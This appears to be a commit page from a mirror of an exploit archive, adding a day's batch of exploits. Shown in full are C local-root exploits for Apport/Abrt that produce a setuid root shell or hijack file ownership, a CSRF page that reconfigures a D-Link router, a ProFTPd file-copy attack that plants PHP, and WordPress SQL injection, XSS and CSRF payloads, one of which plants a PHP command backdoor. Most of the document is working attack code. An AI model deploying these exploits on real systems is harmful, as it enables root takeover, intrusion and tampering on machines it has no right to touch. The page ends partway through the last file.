bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-04-16

Browse source 
21 new exploits
This commit is contained in:
Offensive Security 2015-04-16 08:37:17 +00:00
parent cbae1a2447
commit 68ad4cade7
22 changed files with 964 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

21
files.csv
View file

@ -33145,6 +33145,27 @@ id,file,description,date,author,platform,type,port
36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0
36738,platforms/php/webapps/36738.txt,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 - Shell Upload Vulnerability",2015-04-13,"Claudio Viviani",php,webapps,0
36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0
36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0
36743,platforms/linux/dos/36743.c,"Linux Kernel splice() System Call - Local DoS",2015-04-13,"Emeric Nasi",linux,dos,0
36744,platforms/windows/remote/36744.rb,"Adobe Flash Player casi32 Integer Overflow",2015-04-13,metasploit,windows,remote,0
36745,platforms/osx/local/36745.rb,"Mac OS X ""Rootpipe"" Privilege Escalation",2015-04-13,metasploit,osx,local,0
36746,platforms/linux/local/36746.c,"Apport/Abrt Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
36747,platforms/linux/local/36747.c,"Fedora abrt Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
36751,platforms/php/webapps/36751.txt,"Wordpress Video Gallery 2.8 SQL Injection",2015-04-14,"Claudio Viviani",php,webapps,80
36752,platforms/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_sensor.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36753,platforms/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_time.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36754,platforms/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_stat_uaddr.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36755,platforms/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_user.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36756,platforms/windows/remote/36756.html,"Samsung iPOLiS ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0
36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 admin/base_useradmin.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 admin/index.php BASE_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0
36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 base_ag_main.php Crafted File Upload Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0
36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80
36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 Multiple CSRF XSS Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80
36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Creation Exploit (RCE)",2015-04-14,LiquidWorm,php,webapps,80
36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 'target' Parameter HTML Injection Vulnerability",2012-02-13,sonyy,php,webapps,0
36765,platforms/php/webapps/36765.txt,"Powie pFile 1.02 pfile/kommentar.php filecat Parameter XSS",2012-02-13,indoushka,php,webapps,0
36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0
36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 Cross Site Request Forgery Vulnerability",2012-02-13,MustLive,hardware,remote,0
36768,platforms/php/webapps/36768.txt,"ProWiki 'id' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0

Can't render this file because it is too large.

62
platforms/hardware/remote/36767.html Executable file
View file

@ -0,0 +1,62 @@
source: http://www.securityfocus.com/bid/51985/info
D-Link DAP-1150 is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected device. Other attacks are also possible.
D-Link DAP-1150 firmware version 1.2.94 is vulnerable; other versions may also be affected.
<html>
<head>
<title>Exploit for D-Link DAP 1150. Made by MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="StartCSRF()">
<script>
function StartCSRF() {
for (var i=1;i<=3;i++) {
var ifr = document.createElement("iframe");
ifr.setAttribute(&#039;name&#039;, &#039;csrf&#039;+i);
ifr.setAttribute(&#039;width&#039;, &#039;0&#039;);
ifr.setAttribute(&#039;height&#039;, &#039;0&#039;);
document.body.appendChild(ifr);
}
CSRF1();
setTimeout(CSRF2,1000);
setTimeout(CSRF3,2000);
}
function CSRF1() {
window.frames["csrf3"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
type="hidden" name="res_json" value="y">\n<input type="hidden"
name="res_data_type" value="json">\n<input type="hidden"
name="res_config_action" value="3">\n<input type="hidden"
name="res_config_id" value="7">\n<input type="hidden" name="res_struct_size"
value="0">\n<input type="hidden" name="res_buf"
value="{%22manual%22:true,%20%22ifname%22:%22%22,%20%22servers%22:%2250.50.50.50%22,%20%22defroute%22:true}">\n</form>&#039;;
window.frames["csrf3"].document.hack.submit();
}
function CSRF2() {
window.frames["csrf4"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="res_cmd" value="20">\n<input type="hidden" name="res_buf"
value="null">\n<input type="hidden" name="res_cmd_type" value="bl">\n<input
type="hidden" name="v2" value="y">\n<input type="hidden" name="rq"
value="y">\n</form>&#039;;
window.frames["csrf4"].document.hack.submit();
}
function CSRF3() {
window.frames["csrf2"].document.body.innerHTML = &#039;<form name="hack"
action="http://www.example.com/index.cgi"; method="get">\n<input type="hidden"
name="v2" value="y">\n<input type="hidden" name="rq" value="y">\n<input
type="hidden" name="res_config_action" value="3">\n<input type="hidden"
name="res_config_id" value="69">\n<input type="hidden"
name="res_struct_size" value="1">\n<input type="hidden" name="res_buf"
value="password|">\n</form>&#039;;
window.frames["csrf2"].document.hack.submit();
}
</script>
</body>
</html>

157
platforms/linux/local/36746.c Executable file
View file

@ -0,0 +1,157 @@
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <elf.h>
#include <err.h>
#include <syslog.h>
#include <sched.h>
#include <linux/sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/auxv.h>
#include <sys/wait.h>
# warning this file must be compiled with -static
//
// Apport/Abrt Vulnerability Demo Exploit.
//
// Apport: CVE-2015-1318
// Abrt: CVE-2015-1862
//
// -- taviso@cmpxchg8b.com, April 2015.
//
// $ gcc -static newpid.c
// $ ./a.out
// uid=0(root) gid=0(root) groups=0(root)
// sh-4.3# exit
// exit
//
// Hint: To get libc.a,
// yum install glibc-static or apt-get install libc6-dev
//
int main(int argc, char **argv)
{
int status;
Elf32_Phdr *hdr;
pid_t wrapper;
pid_t init;
pid_t subprocess;
unsigned i;
// Verify this is a static executable by checking the program headers for a
// dynamic segment. Originally I thought just checking AT_BASE would work,
// but that isnt reliable across many kernels.
hdr = (void *) getauxval(AT_PHDR);
// If we find any PT_DYNAMIC, then this is probably not a static binary.
for (i = 0; i < getauxval(AT_PHNUM); i++) {
if (hdr[i].p_type == PT_DYNAMIC) {
errx(EXIT_FAILURE, "you *must* compile with -static");
}
}
// If execution reached here, it looks like we're a static executable. If
// I'm root, then we've convinced the core handler to run us, so create a
// setuid root executable that can be used outside the chroot.
if (getuid() == 0) {
if (chown("sh", 0, 0) != 0)
exit(EXIT_FAILURE);
if (chmod("sh", 04755) != 0)
exit(EXIT_FAILURE);
return EXIT_SUCCESS;
}
// If I'm not root, but euid is 0, then the exploit worked and we can spawn
// a shell and cleanup.
if (setuid(0) == 0) {
system("id");
system("rm -rf exploit");
execlp("sh", "sh", NULL);
// Something went wrong.
err(EXIT_FAILURE, "failed to spawn root shell, but exploit worked");
}
// It looks like the exploit hasn't run yet, so create a chroot.
if (mkdir("exploit", 0755) != 0
|| mkdir("exploit/usr", 0755) != 0
|| mkdir("exploit/usr/share", 0755) != 0
|| mkdir("exploit/usr/share/apport", 0755) != 0
|| mkdir("exploit/usr/libexec", 0755) != 0) {
err(EXIT_FAILURE, "failed to create chroot directory");
}
// Create links to the exploit locations we need.
if (link(*argv, "exploit/sh") != 0
|| link(*argv, "exploit/usr/share/apport/apport") != 0 // Ubuntu
|| link(*argv, "exploit/usr/libexec/abrt-hook-ccpp") != 0) { // Fedora
err(EXIT_FAILURE, "failed to create required hard links");
}
// Create a subprocess so we don't enter the new namespace.
if ((wrapper = fork()) == 0) {
// In the child process, create a new pid and user ns. The pid
// namespace is only needed on Ubuntu, because they check for %P != %p
// in their core handler. On Fedora, just a user ns is sufficient.
if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0)
err(EXIT_FAILURE, "failed to create new namespace");
// Create a process in the new namespace.
if ((init = fork()) == 0) {
// Init (pid 1) signal handling is special, so make a subprocess to
// handle the traps.
if ((subprocess = fork()) == 0) {
// Change /proc/self/root, which we can do as we're privileged
// within the new namepace.
if (chroot("exploit") != 0) {
err(EXIT_FAILURE, "chroot didnt work");
}
// Now trap to get the core handler invoked.
__builtin_trap();
// Shouldn't happen, unless user is ptracing us or something.
err(EXIT_FAILURE, "coredump failed, were you ptracing?");
}
// If the subprocess exited with an abnormal signal, then everything worked.
if (waitpid(subprocess, &status, 0) == subprocess)
return WIFSIGNALED(status)
? EXIT_SUCCESS
: EXIT_FAILURE;
// Something didn't work.
return EXIT_FAILURE;
}
// The new namespace didn't work.
if (waitpid(init, &status, 0) == init)
return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS
? EXIT_SUCCESS
: EXIT_FAILURE;
// Waitpid failure.
return EXIT_FAILURE;
}
// If the subprocess returned sccess, the exploit probably worked, reload
// with euid zero.
if (waitpid(wrapper, &status, 0) == wrapper) {
// All done, spawn root shell.
if (WIFEXITED(status) && WEXITSTATUS(status) == 0) {
execl(*argv, "w00t", NULL);
}
}
// Unknown error.
errx(EXIT_FAILURE, "unexpected result, cannot continue");
}

205
platforms/linux/local/36747.c Executable file
View file

@ -0,0 +1,205 @@
#include <stdlib.h>
#include <unistd.h>
#include <stdbool.h>
#include <stdio.h>
#include <signal.h>
#include <err.h>
#include <string.h>
#include <alloca.h>
#include <limits.h>
#include <sys/inotify.h>
#include <sys/prctl.h>
#include <sys/types.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
//
// This is a race condition exploit for CVE-2015-1862, targeting Fedora.
//
// Note: It can take a few minutes to win the race condition.
//
// -- taviso@cmpxchg8b.com, April 2015.
//
// $ cat /etc/fedora-release
// Fedora release 21 (Twenty One)
// $ ./a.out /etc/passwd
// [ wait a few minutes ]
// Detected ccpp-2015-04-13-21:54:43-14183.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-13-21:54:43-14186.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-13-21:54:43-14191.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-13-21:54:43-14195.new, attempting to race...
// Didn't win, trying again!
// Detected ccpp-2015-04-13-21:54:43-14198.new, attempting to race...
// Exploit successful...
// -rw-r--r--. 1 taviso abrt 1751 Sep 26 2014 /etc/passwd
//
static const char kAbrtPrefix[] = "/var/tmp/abrt/";
static const size_t kMaxEventBuf = 8192;
static const size_t kUnlinkAttempts = 8192 * 2;
static const int kCrashDelay = 10000;
static pid_t create_abrt_events(const char *name);
int main(int argc, char **argv)
{
int fd, i;
int watch;
pid_t child;
struct stat statbuf;
struct inotify_event *ev;
char *eventbuf = alloca(kMaxEventBuf);
ssize_t size;
// First argument is the filename user wants us to chown().
if (argc != 2) {
errx(EXIT_FAILURE, "please specify filename to chown (e.g. /etc/passwd)");
}
// This is required as we need to make different comm names to avoid
// triggering abrt rate limiting, so we fork()/execve() different names.
if (strcmp(argv[1], "crash") == 0) {
__builtin_trap();
}
// Setup inotify, and add a watch on the abrt directory.
if ((fd = inotify_init()) < 0) {
err(EXIT_FAILURE, "unable to initialize inotify");
}
if ((watch = inotify_add_watch(fd, kAbrtPrefix, IN_CREATE)) < 0) {
err(EXIT_FAILURE, "failed to create new watch descriptor");
}
// Start causing crashes so that abrt generates reports.
if ((child = create_abrt_events(*argv)) == -1) {
err(EXIT_FAILURE, "failed to generate abrt reports");
}
// Now start processing inotify events.
while ((size = read(fd, eventbuf, kMaxEventBuf)) > 0) {
// We can receive multiple events per read, so check each one.
for (ev = eventbuf; ev < eventbuf + size; ev = &ev->name[ev->len]) {
char dirname[NAME_MAX];
char mapsname[NAME_MAX];
char command[1024];
// If this is a new ccpp report, we can start trying to race it.
if (strncmp(ev->name, "ccpp", 4) != 0) {
continue;
}
// Construct pathnames.
strncpy(dirname, kAbrtPrefix, sizeof dirname);
strncat(dirname, ev->name, sizeof dirname);
strncpy(mapsname, dirname, sizeof dirname);
strncat(mapsname, "/maps", sizeof mapsname);
fprintf(stderr, "Detected %s, attempting to race...\n", ev->name);
// Check if we need to wait for the next event or not.
while (access(dirname, F_OK) == 0) {
for (i = 0; i < kUnlinkAttempts; i++) {
// We need to unlink() and symlink() the file to win.
if (unlink(mapsname) != 0) {
continue;
}
// We won the first race, now attempt to win the
// second race....
if (symlink(argv[1], mapsname) != 0) {
break;
}
// This looks good, but doesn't mean we won, it's possible
// chown() might have happened while the file was unlinked.
//
// Give it a few microseconds to run chown()...just in case
// we did win.
usleep(10);
if (stat(argv[1], &statbuf) != 0) {
errx(EXIT_FAILURE, "unable to stat target file %s", argv[1]);
}
if (statbuf.st_uid != getuid()) {
break;
}
fprintf(stderr, "\tExploit successful...\n");
// We're the new owner, run ls -l to show user.
sprintf(command, "ls -l %s", argv[1]);
system(command);
return EXIT_SUCCESS;
}
}
fprintf(stderr, "\tDidn't win, trying again!\n");
}
}
err(EXIT_FAILURE, "failed to read inotify event");
}
// This routine attempts to generate new abrt events. We can't just crash,
// because abrt sanely tries to rate limit report creation, so we need a new
// comm name for each crash.
static pid_t create_abrt_events(const char *name)
{
char *newname;
int status;
pid_t child, pid;
// Create a child process to generate events.
if ((child = fork()) != 0)
return child;
// Make sure we stop when parent dies.
prctl(PR_SET_PDEATHSIG, SIGKILL);
while (true) {
// Choose a new unused filename
newname = tmpnam(0);
// Make sure we're not too fast.
usleep(kCrashDelay);
// Create a new crashing subprocess.
if ((pid = fork()) == 0) {
if (link(name, newname) != 0) {
err(EXIT_FAILURE, "failed to create a new exename");
}
// Execute crashing process.
execl(newname, newname, "crash", NULL);
// This should always work.
err(EXIT_FAILURE, "unexpected execve failure");
}
// Reap crashed subprocess.
if (waitpid(pid, &status, 0) != pid) {
err(EXIT_FAILURE, "waitpid failure");
}
// Clean up the temporary name.
if (unlink(newname) != 0) {
err(EXIT_FAILURE, "failed to clean up");
}
// Make sure it crashed as expected.
if (!WIFSIGNALED(status)) {
errx(EXIT_FAILURE, "something went wrong");
}
}
return child;
}

57
platforms/linux/remote/36742.txt Executable file
View file

@ -0,0 +1,57 @@
Description TJ Saunders 2015-04-07 16:35:03 UTC
Vadim Melihow reported a critical issue with proftpd installations that use the
mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands
to be used by *unauthenticated clients*:
---------------------------------
Trying 80.150.216.115...
Connected to 80.150.216.115.
Escape character is '^]'.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
214-CPFR <sp> pathname
214-CPTO <sp> pathname
214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path
214-SYMLINK <sp> source <sp> destination
214-RMDIR <sp> path
214-MKDIR <sp> path
214-The following SITE extensions are recognized:
214-RATIO -- show all ratios in effect
214-QUOTA
214-HELP
214-CHGRP
214-CHMOD
214 Direct comments to root@www01a
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto /tmp/passwd.copy
250 Copy successful
-----------------------------------------
He provides another, scarier example:
------------------------------
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto <?php phpinfo(); ?>
550 cpto: Permission denied
site cpfr /proc/self/fd/3
350 File or directory exists, ready for destination name
site cpto /var/www/test.php
test.php now contains
----------------------
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): FTP session opened.
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php
phpinfo(); ?>' for copying: Permission denied
-----------------------
test.php contains contain correct php script "<?php phpinfo(); ?>" which
can be run by the php interpreter
Source: http://bugs.proftpd.org/show_bug.cgi?id=4169

72
platforms/php/webapps/36751.txt Executable file
View file

@ -0,0 +1,72 @@
######################
# Exploit Title : Wordpress Video Gallery 2.8 SQL Injection Vulnerabilitiey
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
# Dork Google: inurl:/wp-admin/admin-ajax.php?action=googleadsense
# Date : 2015-04-04
# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox
######################
# Description
Wordpress Video Gallery 2.8 suffers from SQL injection
Location file: /contus-video-gallery/hdflvvideoshare.php
add_action('wp_ajax_googleadsense' ,'google_adsense');
add_action('wp_ajax_nonpriv_googleadsense' ,'google_adsense');
function google_adsense(){
global $wpdb;
$vid = $_GET['vid'];
$google_adsense_id = $wpdb->get_var('SELECT google_adsense_value FROM '.$wpdb->prefix.'hdflvvideoshare WHERE vid ='.$vid);
$query = $wpdb->get_var('SELECT googleadsense_details FROM '.$wpdb->prefix.'hdflvvideoshare_vgoogleadsense WHERE id='.$google_adsense_id);
$google_adsense = unserialize($query);
echo $google_adsense['googleadsense_code'];
die();
$vid = $_GET['vid']; is not sanitized
######################
# PoC
http://target/wp-admin/admin-ajax.php?action=googleadsense&vid=[SQLi]
######################
# Vulnerability Disclosure Timeline:
2015-04-04: Discovered vulnerability
2015-04-06: Vendor Notification
2015-04-06: Vendor Response/Feedback
2015-04-07: Vendor Send Fix/Patch (same version number)
2015-04-13: Public Disclosure
#######################
Discovered By : Claudio Viviani
http://www.homelab.it
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################

9
platforms/php/webapps/36752.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51979/info
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
BASE 1.4.5 is vulnerable; other versions may be affected.
Exploit: http://www.example.com/base/base_stat_sensor.php?BASE_path=[EV!L]

9
platforms/php/webapps/36753.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51979/info
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
BASE 1.4.5 is vulnerable; other versions may be affected.
Exploit: http://www.example.com/base/base_stat_time.php?BASE_path=[EV!L]

9
platforms/php/webapps/36754.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51979/info
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
BASE 1.4.5 is vulnerable; other versions may be affected.
Exploit: http://www.example.com/base/base_stat_uaddr.php?BASE_path=[EV!L]

9
platforms/php/webapps/36755.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51979/info
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
BASE 1.4.5 is vulnerable; other versions may be affected.
Exploit: http://www.example.com/base/base_user.php?BASE_path=[EV!L]

9
platforms/php/webapps/36757.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51979/info
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
BASE 1.4.5 is vulnerable; other versions may be affected.
Exploit: http://www.example.com/base/index.php?BASE_path=[EV!L]

9
platforms/php/webapps/36758.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51979/info
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
BASE 1.4.5 is vulnerable; other versions may be affected.
Exploit: http://www.example.com/base/admin/base_useradmin.php?BASE_path=[EV!L]

9
platforms/php/webapps/36759.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51979/info
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
BASE 1.4.5 is vulnerable; other versions may be affected.
Exploit: http://www.example.com/base/admin/index.php?BASE_path=[EV!L]

9
platforms/php/webapps/36760.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/51979/info
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
BASE 1.4.5 is vulnerable; other versions may be affected.
http://www.example.com/base_ag_main.php?ag_action=create File and past your code

45
platforms/php/webapps/36761.txt Executable file
View file

@ -0,0 +1,45 @@
WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit
Vendor: Miwisoft LLC
Product web page: http://www.miwisoft.com
Affected version: 1.0.5
Summary: MiwoFTP is a smart, fast and lightweight file manager
plugin that operates from the back-end of WordPress.
Desc: Input passed to the 'selitems[]' parameter is not properly
sanitised before being used to delete files. This can be exploited
to delete files with the permissions of the web server using directory
traversal sequences passed within the affected POST parameter.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5240
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5240.php
Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog
24.03.2015
--
<html>
<body>
<form action="http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post" method="POST">
<input type="hidden" name="do_action" value="delete" />
<input type="hidden" name="first" value="y" />
<input type="hidden" name="selitems[]" value="../../../../../pls_mr_jailer_dont_deleteme.txt" />
<input type="submit" value="Gently" />
</form>
</body>
</html>

75
platforms/php/webapps/36762.txt Executable file
View file

@ -0,0 +1,75 @@
?
WordPress MiwoFTP Plugin 1.0.5 Multiple CSRF XSS Vulnerabilities
Vendor: Miwisoft LLC
Product web page: http://www.miwisoft.com
Affected version: 1.0.5
Summary: MiwoFTP is a smart, fast and lightweight file manager
plugin that operates from the back-end of WordPress.
Desc: MiwoFTP WP Plugin suffers from multiple cross-site request
forgery and xss vulnerabilities. The application allows users to
perform certain actions via HTTP requests without performing any
validity checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges if a logged-in
user visits a malicious web site. Input passed to several GET/POST
parameters is not properly sanitised before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5241
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5241.php
Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog
24.03.2015
--
GET:
(params: dir, item, order, srt)
-------------------------------
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=list&dir=wp-content"><script>alert(1)</script>&order=name&srt=yes
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=wp-content%2Fuploads&item=test.php"><img%20src%3da%20onerror%3dalert(2)>&order=name&srt=yes
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name"><script>alert(3)</script>&srt=yes&searchitem=test&subdir=y
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name&srt=yes"><script>alert(4)</script>
---
POST:
(params: code, fname, new_dir, newitems[], searchitem, selitems[])
------------------------------------------------------------------
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=wp-content%2Fuploads%2F2015&item=test.php&order=name&srt=yes
- dosave=yes&code="><script>alert(1)</script>&fname=test.php
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=wp-content%2Fuploads%2F2015&item=test.php&order=name&srt=yes
- dosave=yes&code=1&fname=test.php"><img%20src%3da%20onerror%3dalert(2)>
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post&dir=wp-content%2Fuploads&order=name&srt=yes
- do_action=copy&confirm=false&first=n&new_dir=wp-content%2Fuploads%2F1"><script>alert(3)</script>&selitems%5B%5D=test&newitems%5B%5D=test.php
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post&dir=wp-content%2Fuploads&order=name&srt=yes
- do_action=copy&confirm=false&first=n&new_dir=wp-content%2Fuploads%2F2015&selitems%5B%5D=test&newitems%5B%5D=test.php"><script>alert(4)</script>
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name&srt=yes
- searchitem=test"><script>alert(5)</script>&subdir=y
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=arch&dir=wp-content%2Fuploads&order=name&srt=yes
- selitems%5B%5D=test.zip"><script>alert(6)</script>&name=test&type=zip

125
platforms/php/webapps/36763.txt Executable file
View file

@ -0,0 +1,125 @@
?
WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Creation Exploit (RCE)
Vendor: Miwisoft LLC
Product web page: http://www.miwisoft.com
Affected version: 1.0.5
Summary: MiwoFTP is a smart, fast and lightweight file manager
plugin that operates from the back-end of WordPress.
Desc: MiwoFTP WP Plugin suffers from a cross-site request forgery
remote code execution vulnerability. The application allows users
to perform certain actions via HTTP requests without performing any
validity checks to verify the requests. This can be exploited to
perform certain actions like executing arbitrary PHP code by uploading
a malicious PHP script file, with administrative privileges, if a
logged-in user visits a malicious web site.
Tested on: Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5242
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5242.php
Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog
24.03.2015
--
RCE CSRF PoC for masqueraded payload for admin view when editing:
Logic error:
When admin clicks on malicious link the plugin will:
1. Search existing file for edit: action=edit&dir=/&item=wp-comments-post.php.
2. In the root folder of WP, file wp-comments.php is created.
3. Payload is an excerpt from wp-comments-post.php without '<?php' part (SE+HTMLenc).
4. Somewhere below in that code, the evil payload: <?php system($_GET['c']); ?> is inserted.
5. Admin is presented with interface of editing wp-comments.php with contents from wp-comments-post.php.
6. After that, no matter what admin clicks (CSRF) (Save, Reset or Close), backdoor file is created (wp-comments.php).
7. Attacker executes code, ex: http://localhost/wordpress/wp-comments.php?c=whoami
<html>
<body>
